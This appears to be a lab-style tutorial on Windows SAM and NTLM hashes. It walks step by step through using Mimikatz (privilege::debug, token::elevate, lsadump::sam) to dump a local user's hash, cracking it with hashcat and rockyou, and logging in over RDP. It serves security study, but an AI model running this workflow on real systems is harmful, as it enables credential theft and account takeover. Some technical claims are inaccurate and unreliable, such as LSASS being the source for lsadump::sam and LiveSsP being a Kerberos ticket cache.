NTLM, SAM & Mimikatz Overview

Published on June 25, 2025

What is SAM?

The Security Account Manager (SAM) is a Windows database (C:\Windows\system32\config\SAM) that stores local user account information and password hashes. It’s locked by the OS while running. To protect against offline attacks, older Windows used SYSKEY to encrypt parts of SAM.

What is NTLM?

NTLM (NT Hash or NTHash) is the unsalted MD4-based hash of a user’s Unicode password. Microsoft moved from LM (weak, split-into-two 7-char DES hashes) to NTLM on modern systems. NTLM is case-sensitive, supports longer passwords, but still lacks a salt, making it vulnerable to precomputed attacks (rainbow tables) and offline cracking.

Overview of Mimikatz

Mimikatz is a post-exploitation tool by Benjamin Delpy (“gentilkiwi”) that:

  • Extracts plaintext credentials, Kerberos tickets, and NTLM hashes from LSASS memory.
  • Performs pass-the-hash, pass-the-ticket, and token elevation.
  • Requires Administrator privileges and SeDebugPrivilege to read LSASS.

Step-by-Step: Extract & Crack NTLM Hash

1. List Local Users

PS C:\Users\offsec> Get-LocalUser

Explanation: Lists all local accounts; identifies target user (e.g., nelly).

2. Run Mimikatz as Administrator

PS C:\Windows\system32> cd C:\tools
PS C:\tools> .\mimikatz.exe

Explanation: Launches Mimikatz from a folder where it’s stored.

3. Enable Debug Privilege & Elevate to SYSTEM

mimikatz # privilege::debug
mimikatz # token::elevate

Explanation: privilege::debug activates SeDebugPrivilege; token::elevate impersonates the SYSTEM token.

4. Dump NTLM Hashes from SAM

mimikatz # lsadump::sam

Explanation: Extracts NTLM hashes from the locked SAM database via LSASS memory.

5. Retrieve the Hash on Kali

echo "3ae8e5f0ffabb3a627672e1600f1ba10" > nelly.hash

Explanation: Saves the extracted NTLM hash of nelly to a file for cracking.

6. Identify Hashcat Mode for NTLM

hashcat --help | grep -i ntlm

Explanation: Reveals that mode 1000 corresponds to NTLM hashes.

7. Crack with Hashcat

hashcat -m 1000 nelly.hash \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --force

Explanation: -m 1000: NTLM mode; rockyou.txt: password list; best64.rule: common mutations; --force: override warnings.

Result: nelly: nicole1

8. Verify via RDP

mstsc /v:192.168.50.210 /u:nelly

Explanation: Launches Windows RDP client; enter nicole1 when prompted.

Key Takeaways

  • SAM holds unsalted NTLM hashes—offline cracking is easy if you can extract them.
  • LM hashes are obsolete; modern attacks target NTLM or LiveSsP (Kerberos ticket) caches.
  • Mimikatz’s sekurlsa and lsadump::sam modules extract credentials from LSASS.
  • Administrator & SeDebugPrivilege (or SYSTEM) are required to read LSASS memory.
  • Always combine enumeration (Get-LocalUser), extraction (Mimikatz), and cracking (Hashcat) for full workflow.

Linked Articles